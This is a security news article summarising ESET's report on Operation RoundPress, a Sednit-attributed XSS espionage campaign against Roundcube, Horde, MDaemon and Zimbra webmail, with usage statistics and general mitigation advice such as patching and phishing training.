Surge in XSS Cyberattacks Targets Popular Webmail Platforms, ESET Reports

A recent report from ESET has uncovered a sophisticated cyber espionage campaign by the Russia-aligned Sednit group, targeting high-value webmail platforms through cross-site scripting (XSS) attacks.

Dubbed Operation RoundPress, this operation has compromised popular webmail services such as Roundcube, Horde, MDaemon, and Zimbra, with a primary focus on governmental entities and defense organizations in Eastern Europe, alongside targets in Africa, Europe, and South America.

The attacks, initiated through spearphishing emails often tied to Ukraine-related news, exploit both known and zero-day vulnerabilities to inject malicious JavaScript into victims’ webmail interfaces.

Simply opening these crafted emails in a vulnerable webmail portal triggers the attack, enabling cybercriminals to steal credentials, exfiltrate email content, contacts, login histories, and even bypass two-factor authentication (2FA) by creating app passwords for unauthorized mailbox access.

Webmail Popularity Fuels Cybercriminal Opportunities

Webmail services remain a cornerstone of business communication, with global email user numbers reaching 4.37 billion in 2023 and projecting to hit 4.89 billion by 2027, as per recent statistics.

Their appeal, especially among small and medium-sized businesses (SMBs), lies in affordability, flexibility, and ease of access from any internet-connected device without requiring dedicated software.

Litmus telemetry from 2022 indicates webmail as the second-most popular email reading environment at 36%, trailing only Apple Mail.

However, this widespread adoption, coupled with a false sense of inherent security due to built-in protections by market leaders, often leaves organizations complacent.

ESET’s findings reveal that this overreliance on webmail as a low-maintenance solution creates fertile ground for attackers like Sednit, who exploit unpatched vulnerabilities or develop zero-day exploits, as seen with MDaemon in Operation RoundPress.

A 2024 Forrester report further underscores the risk, noting that 22% of breaches via external attacks stem from web application exploits, including XSS and SQL Injection (SQLi), highlighting the critical need for robust cybersecurity measures.

Mitigation Strategies to Counter Webmail Threats

Despite the severity of such cyberattacks, ESET emphasizes actionable defenses that can significantly mitigate risks.

The rapid response to vulnerabilities exemplified by MDaemon’s patch release within two weeks of ESET’s notification demonstrates that timely updates from developers can neutralize threats.

Businesses must prioritize applying these patches immediately upon release to safeguard their systems.

Additionally, user awareness plays a pivotal role; thorough cybersecurity training can equip employees to recognize and avoid phishing attempts disguised as legitimate news or urgent communications, a tactic central to RoundPress.

Beyond prevention, deploying comprehensive security solutions is vital ESET’s own firewall and endpoint protection have proven effective in blocking data exfiltration and malicious scripts at multiple stages of such attacks.

As webmail continues to dominate business communication, organizations must shed the notion of it as a set-and-forget tool and invest in continuous maintenance, vigilant updates, and layered defenses to protect against evolving threats from determined adversaries like Sednit.

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates